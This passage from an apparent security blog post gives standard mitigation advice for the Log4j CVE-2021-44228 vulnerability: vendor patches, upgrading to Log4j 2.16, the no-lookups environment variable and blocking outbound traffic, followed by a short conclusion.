Finally, have a look at the Indicator of Compromise list, which might help in case there has already been a security incident.

How can I mitigate the risk? (The Fix)

The permanent fixes:
  • For each affected vendor product, ping the vendor asking for a patch or minor release. If they tell you that you must update to a major release and your product is not EOL, you should insist on a minor/patch-level release which addresses the vulnerability.
  • For each internal application, update the Log4j library to version 2.16 (or the later releases mentioned in the update above).
    • WARNING: Log4j 2.16 requires Java 8, so if you have Java < 8 there might be some more time-consuming effort. In that case see whether the following workaround is worth trying.

The workarounds:
  • If the Log4j version is >= 2.10, as explained here, you can do the following steps:
    1. export the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true for the whole OS;
    2. relaunch the application;
    3. check whether you're still vulnerable with a PoC.
  • For each affected machine:
    • if it is not supposed to generate egress traffic, block DNS requests and new outbound traffic;
    • if it is supposed to generate outbound traffic, well... that falls into the anomaly detection category, which could help, but be sure it is not a purely fingerprint-based one, since there are a lot of ways to bypass blocking rules;
    • last but not least, it might be interesting to experiment with some kind of RASP, such as this one, which will be able to identify contextual traffic without the risk of bypasses.
Here's a nice infographic about the attack flow and the points of mitigation from GovCert.CH:



Conclusions

This post was written in order to give some clarification about CVE-2021-44228 and to provide some thoughtful information regarding attacks, checks and fixes.
Please comment or email us if you need more clarifications.